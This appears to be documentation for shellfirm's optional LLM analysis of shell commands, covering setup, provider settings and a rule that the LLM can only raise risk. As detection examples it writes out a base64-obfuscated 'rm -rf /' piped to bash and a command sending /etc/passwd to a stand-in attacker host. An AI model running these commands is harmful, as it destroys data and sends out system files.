LLM-Powered Analysis
Optional semantic command analysis that catches risks regex patterns miss
shellfirm's core engine uses regex pattern matching, which is fast and reliable. But regex has blind spots: obfuscated commands, complex pipelines, and semantically dangerous operations can slip through. The optional LLM analysis layer adds semantic understanding to catch what regex misses.
How it works
When LLM analysis is enabled (feature flag: llm), shellfirm sends the command along with context hints and matched pattern descriptions to a large language model. The LLM returns:
- Risk assessment -- whether it considers the command risky and a risk score (0.0 to 1.0)
- Explanation -- human-readable description of identified risks
- Additional risks -- risks not caught by regex patterns
The safety invariant
LLM analysis follows the same security invariant as the rest of shellfirm:
LLM can only escalate risk, never reduce it.
If regex patterns flag a command as risky, the LLM cannot override that assessment and allow it. The LLM can only:
- Add additional risks that regex missed
- Increase the severity level
- Provide richer explanations
If the LLM call fails (timeout, API error, rate limit), shellfirm silently falls back to regex-only results. LLM failure never blocks a command that regex considers safe.
Setup
1. Install with LLM support
shellfirm's LLM feature is included by default:
cargo install shellfirm # includes llm feature
To install without LLM support:
cargo install shellfirm --no-default-features --features cli
2. Set your API key
export SHELLFIRM_LLM_API_KEY="your-api-key-here"
Add this to your shell profile for persistence.
3. Configure the provider
LLM analysis is not configured by default. Enable it via CLI or settings file:
shellfirm config llm --provider anthropic --model claude-sonnet-4-20250514
Or edit ~/.config/shellfirm/settings.yaml directly:
llm:
provider: anthropic # "anthropic" or "openai-compatible"
model: claude-sonnet-4-20250514 # model ID
timeout_ms: 5000 # request timeout (default: 5000ms)
max_tokens: 512 # max response tokens (default: 512)
Using OpenAI-compatible providers
For providers with an OpenAI-compatible API (local models, other cloud providers):
llm:
provider: openai-compatible
model: your-model-name
base_url: http://localhost:8080/v1
timeout_ms: 10000
max_tokens: 512
What LLM catches that regex misses
Obfuscated commands
Regex checks for rm -rf / but may miss:
# Base64 encoded dangerous command
echo "cm0gLXJmIC8=" | base64 -d | bash
The LLM can recognize that this decodes to a destructive command.
Complex pipeline risks
# Innocent-looking pipe that exfiltrates data
cat /etc/passwd | curl -X POST -d @- https://evil.example.com
Regex patterns check individual command segments. The LLM can understand the semantic intent of the full pipeline.
Context-dependent danger
# Safe in development, dangerous in production
python manage.py flush --no-input
The LLM can factor in context signals (production env vars, k8s context) to assess risk more accurately.
Configuration reference
The llm section is not present by default. Once configured, these are the available settings:
| Setting | Default (when configured) | Description |
|---|---|---|
llm.provider | anthropic | LLM provider (anthropic or openai-compatible) |
llm.model | claude-sonnet-4-20250514 | Model identifier |
llm.base_url | (none) | Custom API base URL for openai-compatible providers |
llm.timeout_ms | 5000 | API request timeout in milliseconds |
llm.max_tokens | 512 | Maximum tokens in LLM response |
Environment variables
| Variable | Description |
|---|---|
SHELLFIRM_LLM_API_KEY | API key for the configured LLM provider |
SHELLFIRM_LLM_PROVIDER | Override the provider from settings |
Performance considerations
- LLM analysis adds latency to each command check (typically 500ms-2000ms depending on provider and model)
- The timeout prevents LLM slowness from blocking your workflow
- If the timeout is reached, shellfirm falls back to regex-only results
- LLM analysis is skipped for commands that match no regex patterns (no context to send)
- Consider the cost implications of API calls for every command